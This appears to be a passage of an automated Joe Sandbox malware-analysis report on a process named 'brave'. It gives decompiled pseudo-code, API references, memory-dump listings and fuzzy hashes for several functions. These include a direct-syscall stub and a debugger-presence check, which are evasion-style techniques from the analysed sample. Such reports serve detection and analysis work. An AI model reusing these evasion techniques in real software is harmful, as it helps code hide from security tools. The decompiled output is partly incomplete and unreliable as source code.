0x7ff715b96607
0x7ff715b96614
0x7ff715b9661e
0x7ff715b96626
0x7ff715b9662d
0x7ff715b96633
0x7ff715b96642
0x7ff715b96656
0x7ff715b96666
0x7ff715b96669
0x7ff715b9666b
0x7ff715b9666d
0x7ff715b96673
0x7ff715b9667e

APIs

malloc.MSVCRT ref: 00007FF715BC2752

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 0ebee6292a8557c15174a4ab0a03ffd8c5c9ca548531957df58a5e65fb3db361
Instruction ID: 9e83276ac278e844c77f835a2790aa3f07a9127d26b10abd61bfcaa15f296c11
Opcode Fuzzy Hash: 0ebee6292a8557c15174a4ab0a03ffd8c5c9ca548531957df58a5e65fb3db361
Instruction Fuzzy Hash: F1111CB2909F01C2E739AF14E881369B2A0FB84B68F959135C28D463A4DF7CE549C3A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B963FF Relevance: 1.3, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00007FF77FF715B963FF(void* __rbx, signed char* _a40) {
				signed int _t69;
				signed int _t73;
				signed int _t75;
				signed int _t78;
				signed int _t81;
				void* _t102;
				intOrPtr* _t107;
				signed char* _t110;
				intOrPtr* _t113;
				signed char* _t114;
				signed char* _t116;
				signed char* _t117;
				signed char* _t139;
				signed char* _t140;
				long long _t147;

				_t73 =  *(__rbx + 0x28);
				if (_t73 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2715;
				_t107 = (_t73 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t107 + 4)) = 0;
				 *(__rbx + 0x28) = _t73 + 1;
				 *_t107 = 0x27;
				 *((long long*)(_t107 + 0x10)) = 0x15e45400;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0x11;
				_t75 =  *(__rbx + 0x28);
				if (_t75 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc26ef;
				_t110 = (_t75 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t110 + 4)) = 0;
				 *(__rbx + 0x28) = _t75 + 1;
				 *_t110 = 0x27;
				 *((long long*)(_t110 + 0x10)) = 0x15e453a0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 7;
				E00007FF77FF715B95BC0();
				r9d = 0;
				E00007FF77FF715B94DD0();
				_a40 = _t110;
				_t78 =  *(__rbx + 0x28);
				if (_t78 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2683;
				_t113 = (_t78 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t113 + 4)) = 0;
				 *(__rbx + 0x28) = _t78 + 1;
				 *_t113 = 0x27;
				 *((long long*)(_t113 + 0x10)) = 0x15e453e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0x15b95c22;
				E00007FF77FF715B96EE0(_t113, __rbx);
				_a40 = _t113;
				if (_t113 == 0) goto 0x15b95c20;
				if ( *_t113 != 0x18) goto 0x15b95d39;
				goto 0x15b95c22;
				goto 0x15b96051;
				_t114 = _t113 + 1;
				 *(__rbx + 0x18) = _t114;
				E00007FF77FF715B989F0(__rbx);
				E00007FF77FF715B94DD0();
				_a40 = _t114;
				_t139 = _t114;
				goto 0x15b95f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t139[1]);
				E00007FF77FF715B989F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0x15b96584;
				 *(__rbx + 0x18) = _t139;
				_t116 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0x15b95d30;
				_t147 = _a40;
				if (_t147 == 0) goto 0x15b95c20;
				_t81 =  *(__rbx + 0x38);
				if (_t81 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0x15b95c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t81 * 8)) = _t147;
				 *(__rbx + 0x38) = _t81 + 1;
				E00007FF77FF715B94DD0();
				_a40 = _t116;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t147 + 3;
				E00007FF77FF715B97F20(_t116, __rbx);
				_t140 = _t116;
				if (_t116 != 0) goto 0x15b96386;
				goto 0x15b95c20;
				asm("o16 nop [eax+eax]");
				_push(0x15e453e0);
				_push(_t140);
				_push(__rbx);
				_t117 =  *(__rbx + 0x18);
				if (sil == 0) goto 0x15b966c8;
				 *(__rbx + 0x18) =  &(_t117[1]);
				r10d =  *_t117 & 0x000000ff;
				if (sil != 0) goto 0x15b966d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t69 = (r8d >> 0x1f) + r8d >> 1;
				_t102 =  *((intOrPtr*)( *((intOrPtr*)(0x15e44820 + (_t69 + _t69 * 2) * 8)))) - r10b;
				if (_t102 == 0) goto 0x15b96680;
				if (_t102 <= 0) goto 0x15b966c0;
				r8d = _t69;
				if (0 != r8d) goto 0x15b96648;
				return 0;
			}

0x7ff715b963ff
0x7ff715b96405
0x7ff715b9641c
0x7ff715b96420
0x7ff715b96428
0x7ff715b9642b
0x7ff715b96431
0x7ff715b96435
0x7ff715b9643e
0x7ff715b96444
0x7ff715b9645b
0x7ff715b9645f
0x7ff715b96467
0x7ff715b9646a
0x7ff715b96470
0x7ff715b96474
0x7ff715b96480
0x7ff715b96485
0x7ff715b96493
0x7ff715b96498
0x7ff715b964a2
0x7ff715b964a8
0x7ff715b964bf
0x7ff715b964c3
0x7ff715b964cb
0x7ff715b964ce
0x7ff715b964d4
0x7ff715b964d8
0x7ff715b964dc
0x7ff715b964eb
0x7ff715b964f0
0x7ff715b964f8
0x7ff715b96501
0x7ff715b96507
0x7ff715b96512
0x7ff715b96517
0x7ff715b9651e
0x7ff715b96522
0x7ff715b96537
0x7ff715b9653c
0x7ff715b96541
0x7ff715b96544
0x7ff715b96550
0x7ff715b96557
0x7ff715b9655e
0x7ff715b9656a
0x7ff715b9656c
0x7ff715b96570
0x7ff715b96575
0x7ff715b9657c
0x7ff715b9657f
0x7ff715b96584
0x7ff715b9658c
0x7ff715b96592
0x7ff715b96598
0x7ff715b965a8
0x7ff715b965b2
0x7ff715b965ba
0x7ff715b965bf
0x7ff715b965d0
0x7ff715b965da
0x7ff715b965de
0x7ff715b965e6
0x7ff715b965ec
0x7ff715b965f2
0x7ff715b965f7
0x7ff715b96600
0x7ff715b96601
0x7ff715b96602
0x7ff715b96607
0x7ff715b96614
0x7ff715b9661e
0x7ff715b96626
0x7ff715b9662d
0x7ff715b96633
0x7ff715b96642
0x7ff715b96656
0x7ff715b96666
0x7ff715b96669
0x7ff715b9666b
0x7ff715b9666d
0x7ff715b96673
0x7ff715b9667e

APIs

malloc.MSVCRT ref: 00007FF715BC2752

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 277ec0329c7c4dbc9df98e64df30877a426ff65a56704ba7fd0b275a463b7bd2
Instruction ID: bc3bd2f72e5820944f11e876e101bc1eb7a3366e4bb066f5c354a3f84a30a75a
Opcode Fuzzy Hash: 277ec0329c7c4dbc9df98e64df30877a426ff65a56704ba7fd0b275a463b7bd2
Instruction Fuzzy Hash: D2110072909F0182E729AF14E980369B2A0FF84B28F959135C24D47364DF7C9559C3A4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF715BA6EE0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 35
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715BA6EE0(void* __rcx) {
				long _t1;

				_t1 = GetLastError();
				if (_t1 != 0) goto 0x15ba6f00;
				return _t1;
			}

0x7ff715ba6eea
0x7ff715ba6ef2
0x7ff715ba6efb

APIs

GetLastError.KERNEL32 ref: 00007FF715BA6EEA
FormatMessageA.KERNEL32 ref: 00007FF715BA6F2B
IsDebuggerPresent.KERNEL32 ref: 00007FF715BA6F35

Strings

aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAAaaaAaAaAAAAaaAaAaaaAaAaaaaaaaaa, xrefs: 00007FF715BA6EE2

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: DebuggerErrorFormatLastMessagePresent
String ID: aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAAaaaAaAaAAAAaaAaAaaaAaAaaaaaaaaa
API String ID: 2392558662-1008028691
Opcode ID: fd52d147f527fa6bcd06c01c60e71c22fdd217dc7770cd6842f4e7a378731cf7
Instruction ID: 31dd3959bbeb800826f9f8427dee37072184833721b80dd80d36d4e11dd127ce
Opcode Fuzzy Hash: fd52d147f527fa6bcd06c01c60e71c22fdd217dc7770cd6842f4e7a378731cf7
Instruction Fuzzy Hash: C6016261E28D0281E779AB15F85832AA2B1BBC4FA4F840034EA8D86674EF3DD44C8710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B929D0 Relevance: 9.1, APIs: 7, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b00a401353cf6abcbd2f7365254406fa47fe9b55e4bcc3c616ac570fa9d91661
Instruction ID: a896319644425e314b4f7e641f96a0f4ddd3e43ad40d619ac815e5f90e86b0c7
Opcode Fuzzy Hash: b00a401353cf6abcbd2f7365254406fa47fe9b55e4bcc3c616ac570fa9d91661
Instruction Fuzzy Hash: 2B12B622D18FC141EB35AB29E4057AAE7A0BF95BA4F809231DE8C077A5EF7CD148C715

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA7430 Relevance: 1.5, APIs: 1, Instructions: 31timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF715BA7464

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: 18fc9eb0beef59feb2069f3d82c65cb9a1ff057ea185e49cfd705034b14c2068
Instruction ID: a431e95e8a91dd2f105879af91ffa011658e421cfb9a552aa243705ef555cd3f
Opcode Fuzzy Hash: 18fc9eb0beef59feb2069f3d82c65cb9a1ff057ea185e49cfd705034b14c2068
Instruction Fuzzy Hash: 39F0B4E2B1564943DE64CB19FA4126AA3238B987D4F54C130D90C8BB78EA3CE6468700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B94C80 Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00007FF77FF715B94C80(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a16, long long _a24, long long _a32, long long _a40) {
				void* _t9;
				intOrPtr _t10;
				void* _t11;

				_pop(_t11);
				_a16 = __rcx;
				_a24 = __rdx;
				_a32 = __r8;
				_a40 = __r9;
				_t10 =  *0x15e42b40; // 0x24ac1733
				_t9 = E00007FF77FF715B94C20(_t10, _t11);
				asm("syscall");
				return _t9;
			}

0x7ff715b94c80
0x7ff715b94c81
0x7ff715b94c86
0x7ff715b94c8b
0x7ff715b94c90
0x7ff715b94c99
0x7ff715b94c9f
0x7ff715b94cbf
0x7ff715b94cc1

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae371a8610d859356a0b0e471f64f9d264ed4058a6e4d7a127b9e3f5264a2ab
Instruction ID: 1c48e0f1678ecbdaecce83f902f2fd5547f2d98a7a3d12a2e3ffc068957be459
Opcode Fuzzy Hash: dae371a8610d859356a0b0e471f64f9d264ed4058a6e4d7a127b9e3f5264a2ab
Instruction Fuzzy Hash: 85E01A76908B8081C214EB12F48001EB770F7987C4F004825EECC43B29CF3CC1508B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BB3230 Relevance: 63.2, APIs: 13, Strings: 23, Instructions: 184
fileCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E00007FF77FF715BB3230(void* __edi, void* __eflags, void* __rbx, void* __rcx, void* __rdx, int __rdi, void* __rsi, void* __r12, char* __r13, int __r14, void* __r15) {
				void* _t43;
				void* _t75;
				void* _t93;
				void* _t94;
				intOrPtr _t100;
				long long* _t107;
				void* _t113;
				long long* _t114;
				long long* _t134;
				long long _t136;
				void* _t142;
				char* _t153;
				void* _t154;
				void* _t155;
				void* _t156;
				void* _t157;
				void* _t158;
				long long* _t170;

				_t93 = __edi;
				_t156 = _t155 - 0x90;
				_t154 = _t156 + 0x90;
				 *((long long*)(_t154 - 0x38)) = 0x7562206c;
				_t138 = __rdx - __rcx;
				 *((long long*)(_t154 - 0x40)) = 0x74696d62;
				 *((long long*)(_t154 - 0x30)) = 0x74726f70;
				_t5 = _t138 + 0x78; // 0x756f6e6520746fe6
				 *((long long*)(_t154 - 0x28)) = 0x70747468;
				 *((long long*)(_t154 - 0x20)) = 0x2e636367;
				 *((long long*)(_t154 - 0x18)) = 0x2f67726f;
				_t113 = __rdx - __rcx;
				 *((long long*)(_t154 - 0x70)) = 0x20746f6e;
				 *((long long*)(_t154 - 0x68)) = 0x73206867;
				 *((long long*)(_t154 - 0x60)) = 0x726f6620;
				 *((long long*)(_t154 - 0x58)) = 0x2074616d;
				 *((long long*)(_t154 - 0x50)) = 0x6f69736e;
				 *((long long*)(_t154 - 0x48)) = 0x7361656c;
				 *((long long*)(_t154 - 0x10)) = 0xa3a292f;
				 *((char*)(_t154 - 8)) = 0;
				E00007FF77FF715B9F680(_t43);
				_t157 = _t156 - (_t5 & 0xfffffff0);
				 *((long long*)(_t157 + 0x58)) = 0x7562206c;
				 *((long long*)(_t157 + 0x50)) = 0x74696d62;
				 *((long long*)(_t157 + 0x68)) = 0x70747468;
				 *((long long*)(_t157 + 0x60)) = 0x74726f70;
				 *((long long*)(_t157 + 0x78)) = 0x2f67726f;
				_t142 = __rcx;
				 *((long long*)(_t157 + 0x80)) = 0xa3a292f;
				 *(_t157 + 0x20) = 0x20746f6e;
				 *((long long*)(_t157 + 0x28)) = 0x73206867;
				 *((long long*)(_t157 + 0x30)) = 0x726f6620;
				 *((long long*)(_t157 + 0x38)) = 0x2074616d;
				 *((long long*)(_t157 + 0x40)) = 0x6f69736e;
				 *((long long*)(_t157 + 0x48)) = 0x7361656c;
				 *((long long*)(_t157 + 0x70)) = 0x2e636367;
				memcpy(__rbx, __rsi, __rdi);
				 *((char*)(_t157 + _t113 + 0x88)) = 0;
				E00007FF77FF715BC23A0();
				0;
				0;
				_t158 = _t157 - 0x30;
				if ( *0x15e42d60 != 0) goto 0x15bb34da;
				 *0x15e42d60 = 1;
				E00007FF77FF715BC1BC0(0x2e636367);
				if (0x2e636367 == 0) goto 0x15bb34b0;
				 *((intOrPtr*)(_t158 + 0x2c)) = 0xffffffff;
				r8d = 0;
				E00007FF77FF715B9E1F0(0x2e636367,  *0x2E756E672E63636F + 0x2e636367, _t142, _t113, _t158 + 0x2c);
				_t114 =  *0x15e42c70; // 0x7ff715bb1d50
				 *_t114();
				r8d = 0x30;
				fwrite(_t113, _t157 + 0x20);
				if ( *((intOrPtr*)(_t158 + 0x2c)) == 0) goto 0x15bb34a1;
				 *_t114();
				fputs(__r13);
				 *_t114();
				r8d = 2;
				fwrite(__r12, __r14);
				_t100 =  *((intOrPtr*)(_t158 + 0x2c));
				if (_t100 != 0) goto 0x15bb349c;
				free(__r15);
				E00007FF77FF715BC2110(2, 1, 0x2e636367, _t114, _t113, 0x2e636367,  *0x2E756E672E63636F + 0x2e636367, 0x2e636367);
				 *_t114();
				fputs(_t153);
				goto 0x15bb346b;
				 *0x15e42c70();
				r8d = 0x2d;
				fwrite(??, ??, ??, ??);
				abort();
				 *0x15e42c70();
				r8d = 0x1d;
				fwrite(??, ??, ??, ??);
				abort();
				if (_t100 != 0) goto 0x15bb356f;
				0x15bc1a10();
				_t107 =  *0x2e636367;
				 *((intOrPtr*)(_t107 + 0x10))();
				 *_t114();
				_t170 = _t107;
				r8d = 0xb;
				fwrite(??, ??, ??, ??);
				 *_t114();
				fputs(??, ??);
				 *_t114();
				fputc(??, ??);
				E00007FF77FF715BC1C20(_t107);
				goto 0x15bb34d5;
				0x15bc1a10();
				E00007FF77FF715BC1C20(_t107);
				_t178 = _t107;
				E00007FF77FF715BC1C20(_t107);
				_t134 = _t107;
				E00007FF77FF715B9FEC0();
				E00007FF77FF715BC19A0(_t93, _t94, _t107, _t134);
				 *_t107 = 0x15e47100;
				_t75 = E00007FF77FF715BC2160(8, 1, 0x15e47100, _t114, _t107, 0x15e46af0, 0x7ff715bb31e0, _t170, _t178, 0x2e636367);
				_t136 =  *0x15e42d30; // 0x227ad0a0080
				if (_t136 == 0) goto 0x15bb35e0;
				free(??);
				 *0x15e42d30 = 0;
				return _t75;
			}

0x7ff715bb3230
0x7ff715bb323a
0x7ff715bb3241
0x7ff715bb3292
0x7ff715bb32aa
0x7ff715bb32ad
0x7ff715bb32bb
0x7ff715bb32bf
0x7ff715bb32cd
0x7ff715bb32df
0x7ff715bb32ed
0x7ff715bb32f1
0x7ff715bb32f4
0x7ff715bb32f8
0x7ff715bb32fc
0x7ff715bb3300
0x7ff715bb3304
0x7ff715bb3308
0x7ff715bb330c
0x7ff715bb3310
0x7ff715bb3314
0x7ff715bb3323
0x7ff715bb3333
0x7ff715bb3347
0x7ff715bb3356
0x7ff715bb3365
0x7ff715bb3374
0x7ff715bb3379
0x7ff715bb337c
0x7ff715bb338c
0x7ff715bb3391
0x7ff715bb3396
0x7ff715bb339b
0x7ff715bb33a0
0x7ff715bb33a5
0x7ff715bb33aa
0x7ff715bb33af
0x7ff715bb33b7
0x7ff715bb33bf
0x7ff715bb33ca
0x7ff715bb33ce
0x7ff715bb33d5
0x7ff715bb33e0
0x7ff715bb33e6
0x7ff715bb33ed
0x7ff715bb33f5
0x7ff715bb340b
0x7ff715bb3416
0x7ff715bb3421
0x7ff715bb342b
0x7ff715bb3435
0x7ff715bb3443
0x7ff715bb344c
0x7ff715bb345c
0x7ff715bb345e
0x7ff715bb3466
0x7ff715bb3470
0x7ff715bb3472
0x7ff715bb3487
0x7ff715bb3490
0x7ff715bb3492
0x7ff715bb3497
0x7ff715bb349c
0x7ff715bb34a1
0x7ff715bb34a9
0x7ff715bb34ae
0x7ff715bb34b5
0x7ff715bb34bb
0x7ff715bb34d0
0x7ff715bb34d5
0x7ff715bb34df
0x7ff715bb34e5
0x7ff715bb34fa
0x7ff715bb34ff
0x7ff715bb350b
0x7ff715bb350d
0x7ff715bb3515
0x7ff715bb3518
0x7ff715bb3523
0x7ff715bb3525
0x7ff715bb3528
0x7ff715bb353a
0x7ff715bb3544
0x7ff715bb354c
0x7ff715bb3556
0x7ff715bb3560
0x7ff715bb3565
0x7ff715bb356a
0x7ff715bb356f
0x7ff715bb3574
0x7ff715bb357e
0x7ff715bb3581
0x7ff715bb3586
0x7ff715bb3589
0x7ff715bb3599
0x7ff715bb35b6
0x7ff715bb35b9
0x7ff715bb35c4
0x7ff715bb35ce
0x7ff715bb35d0
0x7ff715bb35d5
0x7ff715bb35e4

APIs

memcpy.MSVCRT ref: 00007FF715BB33AF
fwrite.MSVCRT ref: 00007FF715BB34D0

Part of subcall function 00007FF715B9E1F0: strlen.MSVCRT ref: 00007FF715B9E27E
Part of subcall function 00007FF715B9E1F0: memcpy.MSVCRT ref: 00007FF715B9E292
Part of subcall function 00007FF715B9E1F0: free.MSVCRT ref: 00007FF715B9E29D

fwrite.MSVCRT ref: 00007FF715BB344C
fputs.MSVCRT ref: 00007FF715BB3466
fwrite.MSVCRT ref: 00007FF715BB3487
free.MSVCRT ref: 00007FF715BB3497
fputs.MSVCRT ref: 00007FF715BB34A9
abort.MSVCRT ref: 00007FF715BB34D5
fwrite.MSVCRT ref: 00007FF715BB34FA
abort.MSVCRT ref: 00007FF715BB34FF
fwrite.MSVCRT ref: 00007FF715BB353A
fputs.MSVCRT ref: 00007FF715BB354C
fputc.MSVCRT ref: 00007FF715BB3560

Strings

gcc.gnu., xrefs: 00007FF715BB32C3
terminate called recursively, xrefs: 00007FF715BB34F0
bmit ful, xrefs: 00007FF715BB3329
terminate called without an active exception, xrefs: 00007FF715BB34C6
l bug re, xrefs: 00007FF715BB3249
what(): , xrefs: 00007FF715BB3533
l bug re, xrefs: 00007FF715BB3319
https://, xrefs: 00007FF715BB32A0
nsion (P, xrefs: 00007FF715BB327B
org/bugs, xrefs: 00007FF715BB335B
port at , xrefs: 00007FF715BB32B1
terminate called after throwing an instance of ', xrefs: 00007FF715BB343C
port at , xrefs: 00007FF715BB334C
org/bugs, xrefs: 00007FF715BB32D5
mat expa, xrefs: 00007FF715BB3271
not enou, xrefs: 00007FF715BB3253
https://, xrefs: 00007FF715BB333D
gh space, xrefs: 00007FF715BB325D
bmit ful, xrefs: 00007FF715BB3296
for for, xrefs: 00007FF715BB3267
lease su, xrefs: 00007FF715BB3285
/): , xrefs: 00007FF715BB32E3
gcc.gnu., xrefs: 00007FF715BB336A

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
